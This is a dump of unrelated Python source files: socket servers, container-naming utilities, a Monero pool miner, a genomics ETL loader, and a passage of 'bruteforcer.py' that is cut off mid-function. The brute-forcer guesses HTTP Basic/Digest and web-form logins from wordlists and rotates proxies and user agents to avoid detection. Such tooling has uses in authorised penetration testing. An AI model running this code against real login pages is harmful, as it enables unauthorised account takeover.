def cleanup(self):
self.loop.call_soon_threadsafe(self.loop.stop)
self.thread.join()
self.server.close()
self.loop.run_until_complete(self.server.wait_closed())
#self.loop.close()
super(TcpServer, self).cleanup()
def listen(self, host, port):
factory = self.loop.create_server(self, host, port)
self.server = self.loop.run_until_complete(factory)
Trace.info("listening on {}:{}", host, port)
self.thread.start()
def _on_connect(self, result, context):
super(TcpServer, self)._on_connect(result, context)
if result:
peername = context.transport.get_extra_info('peername')
Trace.info("accepted from {}:{}", peername[0], peername[1])
def _on_disconnect(self, handle, context):
super(TcpServer, self)._on_disconnect(handle, context)
peername = context.transport.get_extra_info('peername')
Trace.info("disconnected from {}:{}", peername[0], peername[1])
# protocol factory
def __call__(self):
return TcpSession(self)
|
self_driver.py | import SocketServer
import threading
import numpy as np
import cv2
import sys
import serial
from keras.models import load_model
from self_driver_helper import SelfDriver
ultrasonic_data = None
# BaseRequestHandler is used to process incoming requests
class UltrasonicHandler(SocketServer.BaseRequestHandler):
data = " "
def handle(self):
while self.data:
self.data = self.request.recv(1024)
ultrasonic_data = float(self.data.split('.')[0])
print(ultrasonic_data)
# VideoStreamHandler uses streams which are file-like objects for communication
class VideoStreamHandler(SocketServer.StreamRequestHandler):
# Include port and baudrate, with timeout of 1 second
ser = serial.Serial("/dev/ttyUSB0", 115200, timeout=1)
model = load_model("saved_model/nn_model.h5")#####################################################
def handle(self):
stream_bytes = b''
driver = SelfDriver(self.ser)
try:
# stream video frames one by one
while True:
stream_bytes += self.rfile.read(1024)
first = stream_bytes.find(b'\xff\xd8')
last = stream_bytes.find(b'\xff\xd9')
if first != -1 and last != -1:
jpg = stream_bytes[first:last + 2]
stream_bytes = stream_bytes[last + 2:]
gray = cv2.imdecode(np.frombuffer(jpg, dtype=np.uint8), cv2.IMREAD_GRAYSCALE)
#image = cv2.imdecode(np.frombuffer(jpg, dtype=np.uint8), cv2.IMREAD_COLOR)
# lower half of the image
height, width = gray.shape
roi = gray[int(height/2):height, :]
cv2.imshow('image', roi)
image_array = roi.flatten().astype(np.float32)
prediction = self.model.predict_classes(image_array)
print("Prediction is", prediction)
# get prediction and then steer
if(int(ultrasonic_data) < 40):
print("Stopping car because of obstacle.")
self.driver.stop()
ultrasonic_data = None
driver.steer(prediction)
finally:
cv2.destroyAllWindows()
sys.exit()
class SelfDriverServer(object):
def __init__(self, host, portUS, portCam):
self.host = host
self.portUS = portUS
self.portCam = portCam
def startUltrasonicServer(self):
# Create the Ultrasonic server, binding to localhost on port 50001
server = SocketServer.TCPServer((self.host, self.portUS), UltrasonicHandler)
server.serve_forever()
def startVideoServer(self):
# Create the video server, binding to localhost on port 50002
server = SocketServer.TCPServer((self.host, self.portCam), VideoStreamHandler)
server.serve_forever()
def start(self):
ultrasonic_thread = threading.Thread(target=self.startUltrasonicServer)
ultrasonic_thread.daemon = True
ultrasonic_thread.start()
self.startVideoServer()
if __name__ == "__main__":
# From SocketServer documentation
HOST, PORTUS, PORTCAM = '192.168.0.15', 50001, 50002
sdc = SelfDriverServer(HOST, PORTUS, PORTCAM)
sdc.start()
|
util.py | """Utilities for working with mulled abstractions outside the mulled package."""
from __future__ import print_function
import collections
import hashlib
import logging
import sys
import threading
import time
import packaging.version
import requests
log = logging.getLogger(__name__)
QUAY_REPOSITORY_API_ENDPOINT = 'https://quay.io/api/v1/repository'
def create_repository(namespace, repo_name, oauth_token):
assert oauth_token
headers = {'Authorization': 'Bearer %s' % oauth_token}
data = {
"repository": repo_name,
"namespace": namespace,
"description": "",
"visibility": "public",
}
requests.post("https://quay.io/api/v1/repository", json=data, headers=headers)
def quay_versions(namespace, pkg_name):
"""Get all version tags for a Docker image stored on quay.io for supplied package name."""
data = quay_repository(namespace, pkg_name)
if 'error_type' in data and data['error_type'] == "invalid_token":
return []
if 'tags' not in data:
raise Exception("Unexpected response from quay.io - no tags description found [%s]" % data)
return [tag for tag in data['tags'] if tag != 'latest']
def quay_repository(namespace, pkg_name):
assert namespace is not None
assert pkg_name is not None
url = 'https://quay.io/api/v1/repository/%s/%s' % (namespace, pkg_name)
response = requests.get(url, timeout=None)
data = response.json()
return data
def _namespace_has_repo_name(namespace, repo_name, resolution_cache):
"""
Get all quay containers in the biocontainers repo
"""
cache_key = "galaxy.tool_util.deps.container_resolvers.mulled.util:namespace_repo_names"
if resolution_cache is not None and cache_key in resolution_cache:
repo_names = resolution_cache.get(cache_key)
else:
repos_parameters = {'public': 'true', 'namespace': namespace}
repos_headers = {'Accept-encoding': 'gzip', 'Accept': 'application/json'}
repos_response = requests.get(
QUAY_REPOSITORY_API_ENDPOINT, headers=repos_headers, params=repos_parameters, timeout=None)
repos = repos_response.json()['repositories']
repo_names = [r["name"] for r in repos]
if resolution_cache is not None:
resolution_cache[cache_key] = repo_names
return repo_name in repo_names
def mulled_tags_for(namespace, image, tag_prefix=None, resolution_cache=None):
"""Fetch remote tags available for supplied image name.
The result will be sorted so newest tags are first.
"""
if resolution_cache is not None:
# Following check is pretty expensive against biocontainers... don't even bother doing it
# if can't cache the response.
if not _namespace_has_repo_name(namespace, image, resolution_cache):
log.debug("skipping mulled_tags_for [%s] no repository" % image)
return []
cache_key = "galaxy.tool_util.deps.container_resolvers.mulled.util:tag_cache"
if resolution_cache is not None:
if cache_key not in resolution_cache:
resolution_cache[cache_key] = collections.defaultdict(dict)
tag_cache = resolution_cache.get(cache_key)
else:
tag_cache = collections.defaultdict(dict)
tags_cached = False
if namespace in tag_cache:
if image in tag_cache[namespace]:
tags = tag_cache[namespace][image]
tags_cached = True
if not tags_cached:
tags = quay_versions(namespace, image)
tag_cache[namespace][image] = tags
if tag_prefix is not None:
tags = [t for t in tags if t.startswith(tag_prefix)]
tags = version_sorted(tags)
return tags
def split_tag(tag):
"""Split mulled image name into conda version and conda build."""
version = tag.split('--', 1)[0]
build = tag.split('--', 1)[1]
return version, build
def version_sorted(elements):
"""Sort iterable based on loose description of "version" from newest to oldest."""
return sorted(elements, key=packaging.version.parse, reverse=True)
Target = collections.namedtuple("Target", ["package_name", "version", "build"])
def build_target(package_name, version=None, build=None, tag=None):
"""Use supplied arguments to build a :class:`Target` object."""
if tag is not None:
assert version is None
assert build is None
version, build = split_tag(tag)
return Target(package_name, version, build)
def conda_build_target_str(target):
rval = target.package_name
if target.version:
rval += "=%s" % target.version
if target.build:
rval += "=%s" % target.build
return rval
def _simple_image_name(targets, image_build=None):
target = targets[0]
suffix = ""
if target.version is not None:
if image_build is not None:
print("WARNING: Hard-coding image build instead of using Conda build - this is not recommended.")
suffix = image_build
else:
suffix += ":%s" % target.version
build = target.build
if build is not None:
suffix += "--%s" % build
return "%s%s" % (target.package_name, suffix)
def v1_image_name(targets, image_build=None, name_override=None):
"""Generate mulled hash version 1 container identifier for supplied arguments.
If a single target is specified, simply use the supplied name and version as
the repository name and tag respectively. If multiple targets are supplied,
hash the package names and versions together as the repository name. For mulled
version 1 containers the image build is the repository tag (if supplied).
>>> single_targets = [build_target("samtools", version="1.3.1")]
>>> v1_image_name(single_targets)
'samtools:1.3.1'
>>> multi_targets = [build_target("samtools", version="1.3.1"), build_target("bwa", version="0.7.13")]
>>> v1_image_name(multi_targets)
'mulled-v1-b06ecbd9141f0dbbc0c287375fc0813adfcbdfbd'
>>> multi_targets_on_versionless = [build_target("samtools", version="1.3.1"), build_target("bwa")]
>>> v1_image_name(multi_targets_on_versionless)
'mulled-v1-bda945976caa5734347fbf7f35066d9f58519e0c'
>>> multi_targets_versionless = [build_target("samtools"), build_target("bwa")]
>>> v1_image_name(multi_targets_versionless)
'mulled-v1-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40'
"""
if name_override is not None:
print("WARNING: Overriding mulled image name, auto-detection of 'mulled' package attributes will fail to detect result.")
return name_override
targets = list(targets)
if len(targets) == 1:
return _simple_image_name(targets, image_build=image_build)
else:
targets_order = sorted(targets, key=lambda t: t.package_name)
requirements_buffer = "\n".join(map(conda_build_target_str, targets_order))
m = hashlib.sha1()
m.update(requirements_buffer.encode())
suffix = "" if not image_build else ":%s" % image_build
return "mulled-v1-%s%s" % (m.hexdigest(), suffix)
def v2_image_name(targets, image_build=None, name_override=None):
"""Generate mulled hash version 2 container identifier for supplied arguments.
If a single target is specified, simply use the supplied name and version as
the repository name and tag respectively. If multiple targets are supplied,
hash the package names as the repository name and hash the package versions (if set)
as the tag.
>>> single_targets = [build_target("samtools", version="1.3.1")]
>>> v2_image_name(single_targets)
'samtools:1.3.1'
>>> multi_targets = [build_target("samtools", version="1.3.1"), build_target("bwa", version="0.7.13")]
>>> v2_image_name(multi_targets)
'mulled-v2-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40:4d0535c94ef45be8459f429561f0894c3fe0ebcf'
>>> multi_targets_on_versionless = [build_target("samtools", version="1.3.1"), build_target("bwa")]
>>> v2_image_name(multi_targets_on_versionless)
'mulled-v2-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40:b0c847e4fb89c343b04036e33b2daa19c4152cf5'
>>> multi_targets_versionless = [build_target("samtools"), build_target("bwa")]
>>> v2_image_name(multi_targets_versionless)
'mulled-v2-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40'
"""
if name_override is not None:
print("WARNING: Overriding mulled image name, auto-detection of 'mulled' package attributes will fail to detect result.")
return name_override
targets = list(targets)
if len(targets) == 1:
return _simple_image_name(targets, image_build=image_build)
else:
targets_order = sorted(targets, key=lambda t: t.package_name)
package_name_buffer = "\n".join(map(lambda t: t.package_name, targets_order))
package_hash = hashlib.sha1()
package_hash.update(package_name_buffer.encode())
versions = map(lambda t: t.version, targets_order)
if any(versions):
# Only hash versions if at least one package has versions...
version_name_buffer = "\n".join(map(lambda t: t.version or "null", targets_order))
version_hash = hashlib.sha1()
version_hash.update(version_name_buffer.encode())
version_hash_str = version_hash.hexdigest()
else:
version_hash_str = ""
if not image_build:
build_suffix = ""
elif version_hash_str:
# tagged verson is <version_hash>-<build>
build_suffix = "-%s" % image_build
else:
# tagged version is simply the build
build_suffix = image_build
suffix = ""
if version_hash_str or build_suffix:
suffix = ":%s%s" % (version_hash_str, build_suffix)
return "mulled-v2-%s%s" % (package_hash.hexdigest(), suffix)
def split_container_name(name):
"""
Takes a container name (e.g. samtools:1.7--1) and returns a list (e.g. ['samtools', '1.7', '1'])
>>> split_container_name('samtools:1.7--1')
['samtools', '1.7', '1']
"""
return name.replace('--', ':').split(':')
class PrintProgress(object):
def __init__(self):
self.thread = threading.Thread(target=self.progress)
self.stop = False
def progress(self):
while not self.stop:
print(".", end="")
sys.stdout.flush()
time.sleep(60)
print("")
def __enter__(self):
self.thread.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop = True
self.thread.join()
image_name = v1_image_name # deprecated
__all__ = (
"build_target",
"conda_build_target_str",
"image_name",
"mulled_tags_for",
"quay_versions",
"split_container_name",
"split_tag",
"Target",
"v1_image_name",
"v2_image_name",
"version_sorted",
)
|
stratum-miner.py | # Copyright (c) 2019, The Monero Project
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import argparse
import socket
import select
import binascii
import pycryptonight
import pyrx
import struct
import json
import sys
import os
import time
from multiprocessing import Process, Queue
pool_host = 'us1.hellominer.com'
pool_port = 4400
pool_pass = 'xx'
wallet_address = '87G6kxXEFZAddY7JWtj48s5LoxuCrLCL7bEMY5vhSWoVdtdFDn7X1KrEp8gKxBZiPxG8EiE2comRiac6rknxLiguBbKKUMd.Replit/mining@daniel.is-a.dev'
nicehash = False
def main():
pool_ip = socket.gethostbyname(pool_host)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((pool_ip, pool_port))
q = Queue()
proc = Process(target=worker, args=(q, s))
proc.daemon = True
proc.start()
login = {
'method': 'login',
'params': {
'login': wallet_address,
'pass': pool_pass,
'rigid': '',
'agent': 'stratum-miner-py/0.1'
},
'id':1
}
print('Logging into pool: {}:{}'.format(pool_host, pool_port))
print('Using NiceHash mode: {}'.format(nicehash))
s.sendall(str(json.dumps(login)+'\n').encode('utf-8'))
try:
while 1:
line = s.makefile().readline()
r = json.loads(line)
error = r.get('error')
result = r.get('result')
method = r.get('method')
params = r.get('params')
if error:
print('Error: {}'.format(error))
continue
if result and result.get('status'):
print('Status: {}'.format(result.get('status')))
if result and result.get('job'):
login_id = result.get('id')
job = result.get('job')
job['login_id'] = login_id
q.put(job)
elif method and method == 'job' and len(login_id):
q.put(params)
except KeyboardInterrupt:
print('{}Exiting'.format(os.linesep))
proc.terminate()
s.close()
sys.exit(0)
def pack_nonce(blob, nonce):
b = binascii.unhexlify(blob)
bin = struct.pack('39B', *bytearray(b[:39]))
if nicehash:
bin += struct.pack('I', nonce & 0x00ffffff)[:3]
bin += struct.pack('{}B'.format(len(b)-42), *bytearray(b[42:]))
else:
bin += struct.pack('I', nonce)
bin += struct.pack('{}B'.format(len(b)-43), *bytearray(b[43:]))
return bin
def worker(q, s):
started = time.time()
hash_count = 0
while 1:
job = q.get()
if job.get('login_id'):
login_id = job.get('login_id')
print('Login ID: {}'.format(login_id))
blob = job.get('blob')
target = job.get('target')
job_id = job.get('job_id')
height = job.get('height')
block_major = int(blob[:2], 16)
cnv = 0
if block_major >= 7:
cnv = block_major - 6
if cnv > 5:
seed_hash = binascii.unhexlify(job.get('seed_hash'))
print('New job with target: {}, RandomX, height: {}'.format(target, height))
else:
print('New job with target: {}, CNv{}, height: {}'.format(target, cnv, height))
target = struct.unpack('I', binascii.unhexlify(target))[0]
if target >> 32 == 0:
target = int(0xFFFFFFFFFFFFFFFF / int(0xFFFFFFFF / target))
nonce = 1
while 1:
bin = pack_nonce(blob, nonce)
if cnv > 5:
hash = pyrx.get_rx_hash(bin, seed_hash, height)
else:
hash = pycryptonight.cn_slow_hash(bin, cnv, 0, height)
hash_count += 1
sys.stdout.write('.')
sys.stdout.flush()
hex_hash = binascii.hexlify(hash).decode()
r64 = struct.unpack('Q', hash[24:])[0]
if r64 < target:
elapsed = time.time() - started
hr = int(hash_count / elapsed)
print('{}Hashrate: {} H/s'.format(os.linesep, hr))
if nicehash:
nonce = struct.unpack('I', bin[39:43])[0]
submit = {
'method':'submit',
'params': {
'id': login_id,
'job_id': job_id,
'nonce': binascii.hexlify(struct.pack('<I', nonce)).decode(),
'result': hex_hash
},
'id':1
}
print('Submitting hash: {}'.format(hex_hash))
s.sendall(str(json.dumps(submit)+'\n').encode('utf-8'))
select.select([s], [], [], 3)
if not q.empty():
break
nonce += 1
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--nicehash', action='store_true', help='NiceHash mode')
parser.add_argument('--host', action='store', help='Pool host')
parser.add_argument('--port', action='store', help='Pool port')
args = parser.parse_args()
if args.nicehash:
nicehash = True
if args.host:
pool_host = args.host
if args.port:
pool_port = int(args.port)
main()
|
transcript_etl.py | """Transcript ETL."""
import re
import logging
import multiprocessing
import uuid
from etl import ETL
from transactors import CSVTransactor
from transactors import Neo4jTransactor
class TranscriptETL(ETL):
"""Transcript ETL."""
logger = logging.getLogger(__name__)
# Query templates which take params and will be processed later
exon_query_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MATCH (g:Transcript {gff3ID:row.parentId})
MATCH (so:SOTerm {name:row.featureType})
MERGE (t:Exon {primaryKey:row.gff3ID})
ON CREATE SET t.gff3ID = row.gff3ID,
t.dataProvider = row.dataProvider,
t.name = row.name,
t.synonym = row.synonym
CREATE (t)<-[tso:TYPE]-(so)
CREATE (g)<-[gt:EXON]-(t)"""
exon_genomic_locations_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MATCH (o:Exon {primaryKey: row.gff3ID})
MATCH (chrm:Chromosome {primaryKey: row.chromosomeNumber})
MATCH (a:Assembly {primaryKey: row.assembly})
CREATE (o)-[ochrm:LOCATED_ON]->(chrm)
CREATE (gchrm:GenomicLocation {primaryKey: row.genomicLocationUUID})
SET gchrm.start = apoc.number.parseInt(row.start),
gchrm.end = apoc.number.parseInt(row.end),
gchrm.assembly = row.assembly,
gchrm.strand = row.strand,
gchrm.chromosome = row.chromosomeNumber
CREATE (o)-[of:ASSOCIATION]->(gchrm)
CREATE (gchrm)-[ofc:ASSOCIATION]->(chrm)
CREATE (gchrm)-[ao:ASSOCIATION]->(a)"""
transcript_alternate_id_query_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MATCH (g:Gene {primaryKey:row.curie})
SET g.gff3ID = row.gff3ID"""
transcript_query_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MATCH (g:Gene {gff3ID:row.parentId})
MATCH (so:SOTerm {name:row.featureType})
MERGE (t:Transcript {primaryKey:row.curie})
ON CREATE SET t.gff3ID = row.gff3ID,
t.dataProvider = row.dataProvider,
t.name = row.name,
t.synonym = row.synonym
MERGE (t)<-[tso:TRANSCRIPT_TYPE]-(so)
MERGE (g)<-[gt:TRANSCRIPT]-(t)"""
chromosomes_query_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MERGE (chrm:Chromosome {primaryKey: row.chromosomeNumber}) """
genomic_locations_query_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MATCH (o:Transcript {primaryKey:row.curie})
MATCH (chrm:Chromosome {primaryKey:row.chromosomeNumber})
MERGE (a:Assembly {primaryKey:row.assembly})
ON CREATE SET a.dataProvider = row.dataProvider
CREATE (o)-[ochrm:LOCATED_ON]->(chrm)
CREATE (gchrm:GenomicLocation {primaryKey:row.genomicLocationUUID})
SET gchrm.start = apoc.number.parseInt(row.start),
gchrm.end = apoc.number.parseInt(row.end),
gchrm.assembly = row.assembly,
gchrm.strand = row.strand,
gchrm.chromosome = row.chromosomeNumber
CREATE (o)-[of:ASSOCIATION]->(gchrm)
CREATE (gchrm)-[ofc:ASSOCIATION]->(chrm)
CREATE (gchrm)-[ao:ASSOCIATION]->(a)"""
def __init__(self, config):
"""Initialise object."""
super().__init__()
self.data_type_config = config
def _load_and_process_data(self):
thread_pool = []
for sub_type in self.data_type_config.get_sub_type_objects():
process = multiprocessing.Process(target=self._process_sub_type, args=(sub_type,))
process.start()
thread_pool.append(process)
ETL.wait_for_threads(thread_pool)
def _process_sub_type(self, sub_type):
self.logger.info("Loading Transcript Data: %s", sub_type.get_data_provider())
commit_size = self.data_type_config.get_neo4j_commit_size()
batch_size = self.data_type_config.get_generator_batch_size()
filepath = sub_type.get_filepath()
# This needs to be in this format (template, param1, params2) others will be ignored
query_template_list = [
[self.transcript_alternate_id_query_template, commit_size,
"transcript_gff3ID_data_" + sub_type.get_data_provider() + ".csv"],
[self.transcript_query_template, commit_size,
"transcript_data_" + sub_type.get_data_provider() + ".csv"],
[self.chromosomes_query_template, commit_size,
"transcript_data_chromosome_" + sub_type.get_data_provider() + ".csv"],
[self.genomic_locations_query_template, commit_size,
"transcript_genomic_locations_" + sub_type.get_data_provider() + ".csv"],
[self.exon_query_template, commit_size,
"exon_data_" + sub_type.get_data_provider() + ".csv"],
[self.exon_genomic_locations_template, commit_size,
"exon_genomic_location_data_" + sub_type.get_data_provider() + ".csv"]
]
# Obtain the generator
generators = self.get_generators(filepath, batch_size)
query_and_file_list = self.process_query_params(query_template_list)
CSVTransactor.save_file_static(generators, query_and_file_list)
Neo4jTransactor.execute_query_batch(query_and_file_list)
self.error_messages("Transcript-{}: ".format(sub_type.get_data_provider()))
def get_generators(self, filepath, batch_size): # noqa
"""Get Generators."""
with open(filepath) as file_handle:
transcript_maps = []
gene_maps = []
exon_maps = []
counter = 0
data_provider = ''
assembly = ''
for line in file_handle:
counter = counter + 1
transcript_map = {}
gene_map = {}
exon_map = {}
curie = ''
parent = ''
gff3_id = ''
synonym = ''
name = ''
transcript_types = ['mRNA', 'ncRNA', 'piRNA', 'lincRNA', 'miRNA', 'pre_miRNA', 'snoRNA', 'lnc_RNA',
'tRNA', 'snRNA', 'rRNA', 'antisense_RNA', 'C_gene_segment',
'V_gene_segment', 'pseudogene_attribute', 'snoRNA_gene', 'pseudogenic_transcript']
possible_types = ['gene', 'exon', 'mRNA', 'ncRNA', 'piRNA', 'lincRNA', 'miRNA',
'pre_miRNA', 'snoRNA', 'lnc_RNA', 'tRNA', 'snRNA', 'rRNA',
'antisense_RNA', 'C_gene_segment', 'V_gene_segment',
'pseudogene_attribute', 'snoRNA_gene', 'pseudogenic_transcript']
gene_id = ''
if line.startswith('#!'):
header_columns = line.split()
if line.startswith('#!assembly'):
assembly = header_columns[1]
elif line.startswith('#!data-source '):
data_provider = header_columns[1]
if data_provider == 'FlyBase':
data_provider = 'FB'
if data_provider == 'WormBase':
data_provider = 'WB'
if data_provider == 'RAT':
data_provider = 'RGD'
elif line.startswith('##FASTA'):
break
elif line.startswith('#'):
continue
else:
columns = re.split(r'\t', line)
feature_type_name = columns[2].strip()
if feature_type_name in possible_types:
column8 = columns[8]
notes = "_".join(column8.split())
kvpairs = re.split(';', notes)
if kvpairs is not None:
for pair in kvpairs:
if "=" in pair:
key = pair.split("=")[0]
value = pair.split("=")[1]
if key == 'ID':
if data_provider == 'WB':
if ":" in value:
gff3_id = value.split(":")[1]
else:
gff3_id = value
else:
gff3_id = value
if key == 'gene_id':
gene_id = value
if key == 'Parent':
if data_provider == 'WB':
parent = value.split(":")[1]
else:
parent = value
if key == 'Name':
name = value
if key == 'transcript_id':
if value.startswith("FB:") or data_provider == 'MGI':
synonym = gff3_id
if ":" in value and data_provider == 'MGI':
gff3_id = value.split(":")[1]
else:
gff3_id = value
if key == 'curie':
curie = value
if self.test_object.using_test_data() is True:
is_it_test_entry = self.test_object.check_for_test_id_entry(curie)
if is_it_test_entry is False:
is_it_test_entry = self.test_object.check_for_test_id_entry(parent)
if is_it_test_entry is False:
is_it_test_entry = self.test_object.check_for_test_id_entry(gene_id)
if is_it_test_entry is True:
counter = counter - 1
continue
if feature_type_name in transcript_types:
transcript_map.update({'curie': curie})
transcript_map.update({'parentId': parent})
transcript_map.update({'gff3ID': gff3_id})
transcript_map.update({'genomicLocationUUID': str(uuid.uuid4())})
transcript_map.update({'chromosomeNumber': columns[0]})
transcript_map.update({'featureType': feature_type_name})
transcript_map.update({'start': columns[3]})
transcript_map.update({'dataProvider': data_provider})
transcript_map.update({'end': columns[4]})
transcript_map.update({'assembly': assembly})
transcript_map.update({'dataProvider': data_provider})
transcript_map.update({'name': name})
transcript_map.update({'synonym': synonym})
if assembly is None:
assembly = 'assembly_unlabeled_in_gff3_header'
transcript_map.update({'assembly': assembly})
transcript_maps.append(transcript_map)
elif feature_type_name == 'gene':
gene_map.update({'curie': curie})
gene_map.update({'parentId': parent})
gene_map.update({'gff3ID': gff3_id})
gene_map.update({'synonym': synonym})
gene_maps.append(gene_map)
elif feature_type_name == 'exon':
exon_map.update({'parentId': parent})
exon_map.update({'gff3ID': str(uuid.uuid4())})
exon_map.update({'genomicLocationUUID': str(uuid.uuid4())})
exon_map.update({'chromosomeNumber': columns[0]})
exon_map.update({'featureType': feature_type_name})
exon_map.update({'start': columns[3]})
exon_map.update({'dataProvider': data_provider})
exon_map.update({'end': columns[4]})
exon_map.update({'assembly': assembly})
exon_map.update({'dataProvider': data_provider})
exon_map.update({'name': name})
exon_map.update({'synonym': synonym})
if assembly is None or assembly == '':
assembly = 'assembly_unlabeled_in_gff3_header'
exon_map.update({'assembly': assembly})
transcript_map.update({'assembly': assembly})
exon_maps.append(exon_map)
else:
continue
if counter == batch_size:
counter = 0
yield [gene_maps,
transcript_maps,
transcript_maps,
transcript_maps,
exon_maps,
exon_maps]
transcript_maps = []
gene_maps = []
exon_maps = []
if counter > 0:
yield [gene_maps,
transcript_maps,
transcript_maps,
transcript_maps,
exon_maps,
exon_maps]
|
bruteforcer.py | import requests,random,smtplib,telnetlib,sys,os,hashlib,base64,subprocess,time,xtelnet,os,threading#,requests_ntlm
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
from ftplib import FTP
from .payloads import *
if os.path.isdir('/data/data')==True:
adr=True
if os.path.isdir('/data/data/com.termux/')==True:
termux=True
import mysqlcp
from .pager import *
from .wp import wpadmin
from .hasher import *
from .pager import *
class http_auth_bruteforce:
__slots__=["logs","stop","finish","result"]
def __init__(self,u,word_list=[],threads_daemon=True,logs=True,domain=None,proxy=None,proxies=None,cookie=None,user_agent=None,timeout=10):
self.stop=False
self.logs=logs
self.finish=False
self.result={}
t=threading.Thread(target=self.crack,args=(u,domain,word_list,logs,proxy,proxies,cookie,user_agent,timeout,))
t.daemon=threads_daemon
t.start()
def done(self):
return self.finish
def crack(self,u,domain,word_list,logs,proxy,proxies,cookie,user_agent,timeout):
if user_agent:
us=user_agent
else:
us=random.choice(ua)
hed={"User-Agent":us}
if cookie:
hed.update({"Cookie":cookie})
prox=None
if proxy:
prox={'http':'http://'+proxy,'https':'http://'+proxy}
if proxies:
prox=random.choice(proxies)
prox={'http':'http://'+prox,'https':'http://'+prox}
try:
if self.logs==True:
print("[*]Checking Authentication Type:")
resp = requests.get(u,proxies=prox,headers=hed, verify=False, timeout=timeout)
if 'basic' in resp.headers['WWW-Authenticate'].lower():
if self.logs==True:
print("==>Basic")
auth_type = requests.auth.HTTPBasicAuth
elif 'digest' in resp.headers['WWW-Authenticate'].lower():
if self.logs==True:
print("==>Digest")
auth_type = requests.auth.HTTPDigestAuth
"""elif 'ntlm' in resp.headers['WWW-Authenticate'].lower():
if self.logs==True:
print("==>Ntlm")
auth_type = requests_ntlm.HttpNtlmAuth
if not domain:
raise Exception('You need to specify a domain for "Ntlm" authentication !\n\nbane.http_auth_bruteforce("http://example.com",domain="example.com",.....)')"""
else:
if self.logs==True:
print("==>Unknown type")
self.finish=True
return
except:
if self.logs==True:
print("bane doesn't support this type of authentication")
self.finish=True
return
for x in word_list:
try:
if self.stop==True:
self.finish=True
break
username=x.split(":")[0]
"""if domain and auth_type==requests_ntlm.HttpNtlmAuth:
username=domain+'\\'+username"""
password=x.split(":")[1]
if self.logs==True:
print("[*]Trying: {} {}".format(username,password))
prox=None
if proxy:
prox={'http':'http://'+proxy}
if proxies:
prox=random.choice(proxies)
prox={'http':'http://'+prox}
if user_agent:
us=user_agent
else:
us=random.choice(ua)
hed={"User-Agent":us}
if cookie:
hed.update({"Cookie":cookie})
r=requests.get(u, auth=auth_type(username,password),proxies=prox,headers=hed, verify=False, timeout=timeout)
if (r.status_code == 200)and("required" not in r.text.lower())and("wrong" not in r.text.lower())and("invalid" not in r.text.lower())and("denied" not in r.text.lower())and("unauthorized" not in r.text.lower()):
if self.logs==True:
print("[+]Success")
self.result={u:username+":"+password}
self.finish=True
break
else:
if self.logs==True:
print("[-]Fail")
except Exception as ex:
if self.logs==True:
print("[-]Fail")
self.finish=True
def access(u,timeout=10,user_agent=None,cookie=None,bypass=False,proxy=None):
if bypass==True:
u+='#'
if user_agent:
us=user_agent
else:
us=random.choice(ua)
hed={'User-Agent': us}
if cookie:
hed.update({"Cookie":cookie})
if proxy:
proxy={'http':'http://'+proxy,'https':'http://'+proxy}
try:
r=requests.get(u, headers = {'User-Agent': random.choice(ua)} , allow_redirects=False,proxies=proxy,timeout=timeout, verify=False)
if r.status_code == requests.codes.ok:
if (("Uncaught exception" not in r.text) or ("404 Not Found" not in r.text)):
return True
except Exception as e:
pass
return False
class web_login_bruteforce:
__slots__=["stop","finish","result","logs"]
def try_combo(self,url,username,password,cookie,user_agent,proxy,timeout):
prox=None
if proxy:
proxy={'http':'http://'+proxy,'https':'http://'+proxy}
cookies=None
h={"User-Agent":user_agent}
if cookie:
h.update({"Cookie":cookie})
cookies=cookie
try:
r=requests.get(url,proxies=proxy,headers=h, verify=False, timeout=timeout)
except:
return False
cook=None
try:
cook=r.headers['Set-cookie']
except:
pass
cookies=set_correct_cookies(cook,cookie=cookie)
form=set_login_form(url, r.text.encode('utf-8','ignore'), username, password)
h={"User-Agent":user_agent}
if cookies:
h.update({"Cookie":cookies})
d=form[0]
h.update({"Referer":form[1],"Origin":form[1].split("://")[0]+"://"+form[1].split("://")[1].split("/")[0]})
try:
